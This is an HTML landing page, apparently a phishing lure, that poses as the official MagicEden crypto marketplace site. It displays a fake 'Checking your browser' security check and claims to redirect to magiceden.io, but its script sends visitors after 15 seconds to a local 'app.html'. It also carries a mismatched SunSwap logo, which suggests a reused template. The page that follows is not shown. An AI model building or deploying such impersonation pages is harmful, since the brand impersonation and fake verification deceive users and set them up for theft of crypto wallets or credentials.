<!doctype html>
<html lang="ru">
<head>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>MagicEden | Official Website – </title>
  <style>
    body {
      margin: 0;
      font-family: system-ui, -apple-system, Segoe UI, Roboto, Helvetica, Arial;
      background: #fff;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      color: #222;
    }
    .wrap {
      text-align: center;
      max-width: 420px;
    }
    .logo {
      width: 100px;
      height: 25px;
      margin-bottom: 20px;
      object-fit: contain;
    }
    h1 { font-size: 20px; margin: 0 0 10px; }
    p  { margin: 0 0 20px; color: #555; }
    .spinner {
      width: 40px; height: 40px;
      border: 4px solid #e5e7eb;
      border-top-color: #6b33ff;
      border-radius: 50%;
      margin: 0 auto 12px;
      animation: spin 1s linear infinite;
    }
    @keyframes spin { to { transform: rotate(360deg) } }
    noscript {
      display: block;
      margin-top: 20px;
      color: red;
      font-weight: bold;
    }
  </style>
</head>
<body>
  <div class="wrap">
    <img src="sunswap.png" alt="SunSwap" class="logo" width="100" height="25" />
    <h1>Checking your browser before accessing…</h1>
	<h1>Redirecting to magiceden.io…</h1>
    <div class="spinner"></div>
    <p></p>
    <noscript>
      Включите JavaScript в браузере, чтобы продолжить.  
      Проверка не пройдена.
    </noscript>
  </div>

  <script>
    setTimeout(() => {
      window.location.href = "app.html";
    }, 15000); 
  </script>
</body>
</html>